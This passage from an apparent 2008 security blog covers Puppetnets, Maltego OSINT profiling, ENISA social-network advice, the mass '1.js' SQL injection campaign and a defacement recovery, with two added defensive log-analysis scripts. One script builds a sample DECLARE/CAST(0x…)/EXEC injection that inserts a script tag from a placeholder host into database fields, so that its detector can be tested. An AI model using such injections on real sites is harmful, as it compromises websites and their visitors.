Specifically, we look at how the existing Web infrastructure (e.g., the languages, protocols, and security policies) can be exploited by malicious Web sites to remotely instruct browsers to orchestrate actions including denial of service attacks, worm propagation and reconnaissance scans. We show that, depending mostly on the popularity of a malicious Web site and user browsing patterns, attackers are able to create powerful botnet-like infrastructures that can cause significant damage. We explore the effectiveness of countermeasures including anomaly detection and more fine-grained browser security policies.
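Since the attack described above depends on a tag planted on somebody else's page, the victim has one tell-tale in its own logs: the Referer header. A planted image produces a flood of requests for a single URL, from many different client addresses, all referred by the same unrelated page, and none of those clients ever fetches a second resource the way a real visitor would. The Python below is an added example of that check over a constructed Apache combined-format log; it is not code from Jeremiah's post, Dancho's post or the Puppetnets paper. The protected hostname victim.example, the referer hosts and the client addresses are all made up for the sample.

```python
import re
from collections import defaultdict, namedtuple
from urllib.parse import urlparse

# Hostname of the site being protected (assumption for this example).
OUR_HOST = "victim.example"

# Apache/nginx "combined" log format: client, identd, user, [timestamp],
# "METHOD path protocol", status, bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
Entry = namedtuple("Entry", "client ts method path status referer ua")


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    return Entry(**m.groupdict()) if m else None


def parse_log(lines):
    return [e for e in map(parse_line, lines) if e is not None]


def referer_host(referer):
    """Hostname part of a Referer value, or None when the header was absent ('-')."""
    if not referer or referer == "-":
        return None
    return urlparse(referer).hostname


def find_launchpads(entries, target_path="/", min_clients=3):
    """Return external referer hosts that sent at least `min_clients` distinct
    clients to `target_path` while none of those clients requested anything
    else. That combination (many clients, one URL, one foreign referer, no
    navigation) is what an invisible <img src="http://victim/"> produces."""
    navigators = {e.client for e in entries if e.path != target_path}
    stats = defaultdict(lambda: {"hits": 0, "clients": set(), "navigating": 0})
    for e in entries:
        if e.path != target_path:
            continue
        host = referer_host(e.referer)
        if host is None or host == OUR_HOST:
            continue  # direct hits and in-site links are not launch pads
        s = stats[host]
        s["hits"] += 1
        s["clients"].add(e.client)
        if e.client in navigators:
            s["navigating"] += 1
    return sorted(
        host for host, s in stats.items()
        if len(s["clients"]) >= min_clients and s["navigating"] == 0
    )


# --- constructed sample log (not real traffic) ------------------------------
def make_line(client, path, referer, ts="22/Apr/2008:10:15:03 +0200"):
    return f'{client} - - [{ts}] "GET {path} HTTP/1.1" 200 512 "{referer}" "Mozilla/5.0 (constructed)"'


SAMPLE_LOG = [
    # ordinary visitors: arrive from a search engine or directly, keep browsing
    make_line("198.51.100.7", "/", "http://www.google.com/search?q=victim"),
    make_line("198.51.100.7", "/style.css", f"http://{OUR_HOST}/"),
    make_line("198.51.100.7", "/news.html", f"http://{OUR_HOST}/"),
    make_line("198.51.100.8", "/", "-"),
    make_line("198.51.100.8", "/news.html", f"http://{OUR_HOST}/"),
]
# a hidden image tag planted on two third-party pages: many distinct clients,
# each fetching only "/" and nothing else
SAMPLE_LOG += [make_line(f"203.0.113.{i}", "/", "http://forum-a.example/thread/12") for i in range(1, 7)]
SAMPLE_LOG += [make_line(f"203.0.113.{i}", "/", "http://board-b.example/guestbook") for i in range(20, 25)]

if __name__ == "__main__":
    for host in find_launchpads(parse_log(SAMPLE_LOG)):
        print("launch pad referer:", host)
```

The hosts this returns are the pages carrying the planted content: they are candidates for a Referer-based deny rule or a tiny cached response at the front end while you ask the hosting sites to remove the snippet. It is a heuristic, not proof: browsers behind privacy proxies send no Referer at all, so a share of the flood will land in the "direct" bucket, which is where the anomaly detection the Puppetnets paper discusses picks up the slack.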

First batch of Shmoocon 2008 presentations online



I haven't seen too many people post this yet but there are already some presentations online.
Get them here.

Now to wait impatiently for the videos and the rest of the presentations to come online.


Wednesday

The dangers of Web 2.0: information gathering tactics 101



Well, we don't even have to talk about Web 2.0 or social networks. A byproduct of the technology age we live in is information. We all have or leave an extensive information waste footprint without even realizing it. This can be (mis)used for identity theft or social engineering. It has only been a few months since I mentioned Maltego. The tool, which has migrated from a web-based application to a downloadable GUI, still leaves Google behind when it comes to personal information gathering.

Since the web-based application has been taken offline, I downloaded the GUI and played around with it. Of course, I used it on my own name and on my company, and I can only say 'WOW'. Just try it; you'll be surprised at the information out there.

What is it?

  • Maltego is a program that can be used to determine the relationships and real world links between:
    • People
    • Groups of people (social networks)
    • Companies
    • Organizations
    • Web sites
    • Internet infrastructure such as:
      • Domains
      • DNS names
      • Netblocks
      • IP addresses
    • Phrases
    • Affiliations
    • Documents and files
  • These entities are linked using open source intelligence.
  • Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
  • Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections.
  • Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away.
  • Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.

What can Maltego do for me?

  • Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.
  • Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
  • Maltego provides you with a much more powerful search, giving you smarter results.
  • If access to "hidden" information determines your success, Maltego can help you discover it.
Look at the screenshots here.
Download here.
Download your API key here.

Your security policy and awareness program should take this into account. To get an idea of the issue and some suggested countermeasures, read ENISA's paper on "Security Issues and Recommendations for Online Social Networks" (thanks to ISSA BE for mentioning this paper).

Introduction

This paper aims to provide a useful introduction to security issues in the area of Social Networking, highlight the most important threats and make recommendations for action and best practices to reduce the security risks to users. Examples are given from a number of providers throughout the paper. These should be taken as examples only and there is no intention to single out a specific provider for criticism or praise. The examples provided are not necessarily those most representative or important, nor is the aim of this paper to conduct any kind of market survey, as there might be other providers which are not mentioned here and nonetheless are equally or more representative of the market.

Audience

This paper is aimed at corporate and political decision-makers as well as Social Network application-providers. It also seeks to raise awareness among political and corporate decision-makers of the legal and social implications of new developments in Social Networking technologies. In particular, the findings should have important implications for education and data protection policy.
Some recommendations of the report are:
  • Recommendation SN.1 Encourage awareness-raising and educational campaigns
  • Recommendation SN.2 Review and reinterpret the regulatory framework
  • Recommendation SN.3 Increase transparency of data handling practices
  • Recommendation SN.4 Discourage the banning of SNSs in schools
  • Recommendation SN.5 Promote stronger authentication and access-control where appropriate
  • .....
Download full report here.

Update: Chris Gates also refers to the following two presentations (thanks!!):

Presentations on Maltego:
CansecWest07 Presentation [PPT] (1.8MB)
FIRST 2007 Presentation [PPT] (4.5MB)


Mass malware SQL injections still continuing and the number of Belgian sites infected



In the last weeks and months, several campaigns targeted a lot of websites to inject them with malicious JavaScript, mainly through SQL injection. High-profile websites, like for example CNET.com, were also victims of these attacks. It seems that they are at it again. A lot of websites got infected with "1.js", including UK government sites and a United Nations website, "events.un.org". It was only last December that the UN website also got hacked through an SQL injection.


This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on http://www.nihao[removed].com. The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously, files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing.

There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here. Mentioned in that diary entry is http://www.2117[removed].net. Our blog on that attack can be found here. It appears that same tool was used to orchestrate this attack too.

When we first started tracking the use of this domain, the malicious JavaScript was still making use of http://www.nmida[removed].com/:

Now the attackers are referring to a file hosted on the new domain of http://www.nihao[removed].com:

Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search results below.

The number of sites affected is in the hundreds of thousands (Source: Websense)
Read full post here.

At the moment, Google shows some 177.000 websites infected. And please don't visit them with JavaScript enabled. Use your Google Foo.



I was curious how many Belgian websites got infected. Ladies and gentlemen of the jury, it's 56!!!



My first instinct was to report this, but my next thought was: to whom? I don't have time to track the webmasters down one by one. And Belgium doesn't have a CERT to contact. We do have the FCCU (Federal Computer Crime Unit), but that is partly a forensics team, not a nationwide CERT. *sigh*

I left them a message anyway. Let's hope it will do some good.

Sophos has some more information about the SQL injection technique used.


This morning, I was investigating another attack that is most likely related. The target of the malicious script tag has changed, but the underlying malicious SQL is very similar. The malicious injection can be seen below:

As you can see, the main guts of the malicious SQL (within @S) are obfuscated within the CAST(0x…) block (which is trimmed for clarity). Decryption is trivial, enabling us to identify how the attack works.

In brief, the SQL will concatenate a malicious script tag into all (n)text and (n)varchar fields of all user tables in the MS SQL database. Nasty. Particularly for webmasters who have been hit, leaving them with a cumbersome cleanup process, and the challenge of preventing the same attack hitting them again.

And the purpose of the attack? Feeding the 1.js file into our automation system, we see a whole mass of pages that will get loaded as a result of browsing a compromised page. This is represented in the flowchart below (click to enlarge):

  • yellow blob: malicious 1.js file loaded from compromised pages
  • green arrows: page loads via an iframe (or similar)
  • red arrows: exploit payload, in this case resulting in the download of some Win32 malware
Read their full analysis.
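Sophos describes the injected statement as a hex blob inside CAST(0x…), assigned to @S and then executed. Because the target type is NVARCHAR, that blob is UTF-16LE text, so once you have spotted the DECLARE/CAST/EXEC shape in your web server logs, decoding it to see what it would have done to your tables is a two-line job. The Python below is an added example of that triage over a constructed IIS-style log; it is not Sophos's or Websense's code. The decoded sample statement uses placeholder table and column names and a placeholder script host, and only touches one column, unlike the real campaign, which walked every text column of every user table.

```python
import re
from urllib.parse import quote, unquote_plus

# Shape of the injection as described in the Sophos write-up: a CAST of a hex
# literal to (N)VARCHAR, and a DECLARE'd variable that is later EXEC'd.
CAST_HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)
DECLARE_EXEC_RE = re.compile(r"DECLARE\s+@\w+.*?EXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE | re.DOTALL)
# Strings whose presence in the decoded payload confirms it is not a legitimate query.
SUSPICIOUS_KEYWORDS = ("<script", "sysobjects", "syscolumns", "update ", "exec(")


def decode_cast_hex(hex_digits, nvarchar=True):
    """Turn the 0x... literal back into text. NVARCHAR data is UTF-16LE,
    which is why the hex blob is twice the length of the text it hides;
    a plain VARCHAR literal is single-byte (treated as Latin-1 here)."""
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits  # tolerate a truncated, odd-length blob
    raw = bytes.fromhex(hex_digits)
    if nvarchar:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyse_query(query_string):
    """Decode the URL-encoded query string and report whether it carries the
    DECLARE/CAST(0x..)/EXEC pattern and what each hex payload decodes to."""
    decoded = unquote_plus(query_string)
    payloads = []
    for m in CAST_HEX_RE.finditer(decoded):
        text = decode_cast_hex(m.group(1), nvarchar=bool(m.group(2)))
        hits = [kw for kw in SUSPICIOUS_KEYWORDS if kw in text.lower()]
        payloads.append({"decoded": text, "indicators": hits})
    declare_exec = DECLARE_EXEC_RE.search(decoded) is not None
    return {
        "suspicious": declare_exec or any(p["indicators"] for p in payloads),
        "declare_exec": declare_exec,
        "payloads": payloads,
    }


def scan_log(lines):
    """Return (line_no, verdict) for every log line whose uri-query is suspicious.
    Assumed field order: date time server-ip method uri-stem uri-query status."""
    findings = []
    for i, line in enumerate(lines, 1):
        fields = line.split(" ")
        if len(fields) < 7 or fields[5] == "-":
            continue
        verdict = analyse_query(fields[5])
        if verdict["suspicious"]:
            findings.append((i, verdict))
    return findings


# --- constructed sample data (not captured traffic) -------------------------
# What the hex blob decodes to. Names and host are placeholders.
SAMPLE_STATEMENT = (
    "UPDATE placeholder_table SET placeholder_col=placeholder_col+"
    "'<script src=\"http://EXAMPLE-DOMAIN.invalid/1.js\"></script>'"
)
SAMPLE_HEX = SAMPLE_STATEMENT.encode("utf-16-le").hex().upper()
MALICIOUS_QUERY = quote(
    f"id=1;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x{SAMPLE_HEX} AS NVARCHAR(4000));EXEC(@S);--",
    safe="=;()@-",
)
SAMPLE_LOG = [
    "2008-04-22 10:14:59 192.0.2.10 GET /news.asp id=7 200",
    f"2008-04-22 10:15:03 192.0.2.10 GET /news.asp {MALICIOUS_QUERY} 200",
    "2008-04-22 10:15:10 192.0.2.10 GET /default.asp - 200",
]

if __name__ == "__main__":
    for line_no, verdict in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: DECLARE/EXEC pattern = {verdict['declare_exec']}")
        for p in verdict["payloads"]:
            print("  indicators:", p["indicators"])
            print("  decoded   :", p["decoded"])
```

Two things worth noticing once you run this on real logs: the hex blob lives in the URL, so it is sitting in your IIS logs already, and a search for `CAST(0x` or `%20AS%20NVARCHAR` finds every attempt, blocked or not; and the decoded text tells you exactly which script host to look for when cleaning the affected columns. Spotting it after the fact is still second best to the parameterised queries that would have made the injection fail in the first place.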

Update (23/04/2008): I got a response from the FCCU, and the BELNET CERT has taken over the case. Their priority is of course their constituency (BELNET). But as the only CERT in Belgium, they try to be a "last resort" point of contact as long as their resources allow it. That's very nice to hear!!! I might have a meeting with them in the future to exchange some ideas.

In the meantime, the number of infected sites displayed has mounted up to 273.000, and the number of infected Belgian sites to 93.


Tuesday

How did The Sports Network recover from the Chinese defacement?



During an attack on CNN, The Sports Network got defaced because the Chinese hackers thought it was a part of CNN. But it was only a source for CNN.

So how did TSN recover from the attack? The ZDNet blog Zero Day has some information on it.

The company’s sports information and wire service was the priority when SportsNetwork brought its operations back up. Within a few hours, SportsNetwork, which primarily competes with Stats Inc., was serving its feeds to thousands of customers, which range from portals to most newspapers in the U.S. The data feeds (example right) represent the bulk of SportsNetwork’s revenue. The company’s site serves more as a marketing showcase.

The lesson: Recover the revenue generating tools first. Sports Network, based in Hatboro, PA, has about 130 employees, a CTO and about 18 developers working on the site.

Will Sports Network change its security policies? Charles said on the security front his company had “all the things that everyone has” and noted that it’s obvious that his firm will have to do more. The challenge is that any change the company makes will have to be echoed by more than 1,000 customers.

Sports Network may speed up plans to add another layer of security, but is leaving the planning to his CTO. Whatever Sports Network does it’ll have to do so quickly. “The irony is we’re sending a gang of people to Beijing for the Olympics,” says Charles.

Read the full article.

Do you have an incident response plan? Did you test it? Do you have good backups?


(IN)SECURE Magazine Issue 16 released


  • Security policy considerations for virtual worlds
  • US political elections and cybercrime
  • Using packet analysis for network troubleshooting
  • The effectiveness of industry certifications
  • Is your data safe? Secure your web apps
  • RSA Conference 2008 / Black Hat 2008 Europe
  • Windows log forensics: did you cover your tracks?
  • Traditional vs. non-traditional database auditing
  • Payment card data: know your defense options
  • Security risks for mobile computing on public WLANs: hotspot registration
  • Network event analysis with Net/FSE
  • Producing secure software with security enhanced software development processes
  • AND MORE!
Download issue here.
